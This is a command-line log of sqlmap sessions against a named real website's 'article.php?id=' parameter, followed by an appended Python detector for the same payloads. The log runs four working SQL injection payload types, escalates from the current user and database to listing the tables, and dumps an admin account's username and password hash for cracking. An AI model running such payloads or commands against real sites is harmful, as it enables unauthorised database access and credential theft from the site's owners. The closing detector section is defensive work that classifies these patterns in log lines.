D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>
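Added example, not part of the original post: a small Python detector that takes constructed Apache access-log lines (IPs, timestamps and sizes are made up), URL-decodes each request the way the server would, classifies it into the four sqlmap technique families reported in the session above, and expands MySQL CHAR(n,n,...) calls so the `:cvx:` / `:ncv:` marker strings that sqlmap wraps around extracted values become readable in the alert.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not taken from the page) carrying the payload shapes
# sqlmap reported above, URL-encoded the way they would land in a real access log.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2011:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2011:16:53:54 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2011:16:53:55 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT%20(CASE%20WHEN%20(8404%3D8404)%20THEN%201%20ELSE%200%20END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 312
10.0.0.5 - - [01/Jan/2011:16:53:55 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(CHAR(58,99,118,120,58),CHAR(58,110,99,118,58)),NULL%23 HTTP/1.1" 200 4870
10.0.0.5 - - [01/Jan/2011:16:53:56 +0800] "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120
"""

# Ordered: the error-based payload also contains "AND (", so more specific rules come first.
RULES = [
    ("time-based blind", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(|information_schema", re.I)),
    ("boolean-based blind", re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I)),
]

CHAR_CALL = re.compile(r"\bCHAR\(((?:\d+\s*,\s*)*\d+)\)", re.I)
REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def decode_char_calls(sql):
    """Replace MySQL CHAR(58,99,...) with the quoted literal it builds, e.g. ':cvx:'."""
    return CHAR_CALL.sub(
        lambda m: "'" + "".join(chr(int(n)) for n in m.group(1).split(",")) + "'", sql)


def classify_line(line):
    """Return (technique, decoded query string) or None when the request looks benign."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = unquote_plus(m.group(1))        # %20 -> space, %3D -> '=', %23 -> '#'
    query = url.partition("?")[2]
    for technique, pattern in RULES:
        if pattern.search(query):
            return technique, decode_char_calls(query)
    return None


def scan_log(text):
    """Classify every line of an access log, dropping benign requests."""
    return [r for r in (classify_line(l) for l in text.splitlines()) if r]


if __name__ == "__main__":
    for technique, query in scan_log(SAMPLE_LOG):
        print(f"{technique:20} {query}")
```

Matching on the decoded query string matters: the same payloads arrive with `%20`, `%3D` and `%23` in place of space, `=` and `#`, so a rule applied to the raw log line would miss them.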